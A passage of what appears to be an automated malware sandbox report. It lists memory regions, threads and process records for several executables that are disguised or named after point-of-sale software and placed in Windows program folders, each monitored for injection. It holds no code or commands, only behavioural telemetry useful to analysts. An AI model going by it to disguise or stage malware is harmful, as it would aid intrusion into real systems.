"c:\\windows\\syswow64\\msctf.dll") Region: id = 4516 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4517 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4518 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4519 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4520 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4521 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4522 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 253 os_tid = 0x1288 Thread: id = 254 os_tid = 0x1158 Process: id = "66" image_name = "mxslipstream.exe" filename = "c:\\program files (x86)\\windowspowershell\\mxslipstream.exe" page_root = "0x55bca000" os_pid = "0x12ec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\mxslipstream.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 255 os_tid = 0x1310 Thread: id = 256 os_tid = 0x12f0 Process: id = "67" image_name = "thunderbird.exe" filename = "c:\\program files\\common files\\thunderbird.exe" page_root = "0x103dc000" os_pid = "0x11c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Common Files\\thunderbird.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2741 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2742 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2743 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2744 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2745 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2746 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2747 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2748 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2749 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2750 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2751 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2752 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2753 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2754 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2755 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2756 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2757 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 2758 start_va = 0xab0000 end_va = 0xb6bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 2759 start_va = 0xbc0000 end_va = 0xbd6fff monitored = 0 entry_point = 0xbc14a1 region_type = mapped_file name = "thunderbird.exe" filename = "\\Program Files\\Common Files\\thunderbird.exe" (normalized: "c:\\program files\\common files\\thunderbird.exe") Region: id = 2760 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 2761 start_va = 0x2110000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 2762 start_va = 0x2130000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 2763 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2764 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2765 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2766 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2767 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2768 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2769 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2770 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2771 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2772 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2773 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2774 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2775 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2776 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2777 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2778 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2779 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2780 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2781 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2782 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2783 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2784 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2785 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2786 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2787 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2788 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 2789 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2790 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2791 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2792 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2793 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2794 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 5147 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5148 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 5149 start_va = 0x1fe0000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 5150 start_va = 0x2140000 end_va = 0x2476fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 257 os_tid = 0x12cc Thread: id = 258 os_tid = 0x11c8 Process: id = "68" image_name = "aldelo.exe" filename = "c:\\program files (x86)\\windows photo viewer\\aldelo.exe" page_root = "0x5eb74000" os_pid = "0x1210" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\aldelo.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5099 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5100 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5101 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5102 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5103 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5104 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5105 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5106 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5107 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5108 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5109 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5110 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5111 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5112 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 5113 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 5114 start_va = 0x7d0000 end_va = 0x88bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 5115 start_va = 0x8b0000 end_va = 0x8c6fff monitored = 0 entry_point = 0x8b14a1 region_type = mapped_file name = "aldelo.exe" filename = "\\Program Files (x86)\\Windows Photo Viewer\\aldelo.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\aldelo.exe") Region: id = 5116 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 5117 start_va = 0xa60000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 5118 start_va = 0xbf0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 5119 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 5120 start_va = 0x22f0000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 5121 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5122 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5123 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5124 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 5125 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 5126 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 5127 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5128 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5129 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5130 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5131 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5132 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5133 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5134 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5135 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5136 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5137 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5138 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5139 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5140 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5141 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5142 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5143 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5144 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5145 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5146 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 259 os_tid = 0x12c8 Thread: id = 260 os_tid = 0x1214 Process: id = "69" image_name = "spcwin.exe" filename = "c:\\program files (x86)\\internet explorer\\spcwin.exe" page_root = "0x6b00a000" os_pid = "0x1320" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\spcwin.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 261 os_tid = 0x133c Thread: id = 262 os_tid = 0x1324 Process: id = "70" image_name = "fpos.exe" filename = "c:\\program files (x86)\\windows photo viewer\\fpos.exe" page_root = "0x696c2000" os_pid = "0x12e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\fpos.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 263 os_tid = 0x130c Thread: id = 264 os_tid = 0x12e8 Process: id = "71" image_name = "barca.exe" filename = "c:\\program files\\msbuild\\barca.exe" page_root = "0x75312000" os_pid = "0x1124" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\MSBuild\\barca.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4427 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4428 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4429 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4430 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 